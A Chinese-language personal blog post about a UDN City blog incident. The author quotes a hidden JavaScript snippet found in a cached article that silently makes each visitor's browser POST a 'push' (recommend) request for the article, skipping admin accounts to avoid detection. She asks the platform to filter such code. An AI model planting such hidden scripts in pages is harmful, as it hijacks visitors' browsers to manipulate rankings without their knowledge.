Cynthia對事件處理還有著疑問,因為許多事情沒有得到良好的解釋與補救。
Cynthia用Google搜尋“一樹灼紅”,看了Google在2007年3月9日所存的備份(網址: http://72.14.235.104/search?q=cache:MKxOrROytlIJ:city.udn.com/v1/blog/article/article.jsp%3Fuid%3Dqwer1339%26f_ART_ID%3D787149+%E4%B8%80%E6%A8%B9%E7%81%BC%E7%B4%85&hl=zh-TW&ct=clnk&cd=1&gl=tw )。依照網頁原始碼內文搜尋可疑的Java Script,在本文區中搜尋到了~
<!-- 創作文章 start -->
....
<span id="mainbody">
....
<SCRIPT LANGUAGE="JavaScript">function udn_main(str2) {var url;var xmlHttp = GetXmlHttpObject(); if (xmlHttp == null) { return; } url= 'https://city.udn.com/v1/blog/article/push_art.jsp?uid=qwer1339&f_ART_ID=' + str2; xmlHttp.open("POST", url ,true);try { xmlHttp.send(null); } catch(e) { } } function GetXmlHttpObject() { var dc = document.cookie; var num=dc.indexOf("udnmember=webadmin"); if (num > 0) { return(null); } var tmpx = null; if(window.XMLHttpRequest) { tmpx = new XMLHttpRequest();} else if (window.ActiveXObject) { try { tmpx = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { tmpx = new ActiveXObject("MSXML2.XMLHTTP.3.0"); } catch (e) {} } } return tmpx;} </script>
....
<!-- 創作文章 end -->
上面這段程式碼,就是麵麵大大說明的那段程式碼原文....(它一直靜靜地躺在那裡直到主人不再要它....)
....
可是電姊姊沒說多少Iris姊姊發表的主文甚至回應中有類似的程式碼....
自己還想到另一種可能:如果有人利用城邦網誌文章以及個人簽名檔不顯示修改紀錄的特性,用這種語法甚至更惡質的語法植入後,針對特定或不定對象行動後再更改煙滅證據呢?而Google等搜尋引擎恰好沒找到這種網頁供作以後追查的證據呢?
這些恐懼縈繞心頭,愈來愈大,像團吞噬著希望的黑霧不斷擴展,蝕去了自己對人的信心....
我....之前不明所以的受害了幾次,其中二次讓自己傷心的不再想上網了,所以Cynthia很期望城邦能對留言者的簽名做過濾,像其他地方系統會過濾一些關鍵字一樣,不再讓人擔心。
可是沒見到城邦有類似的管理計畫公布....
以上就是Cynthia對這漸事後仍存在的一點點疑慮~
字體:小 中 大
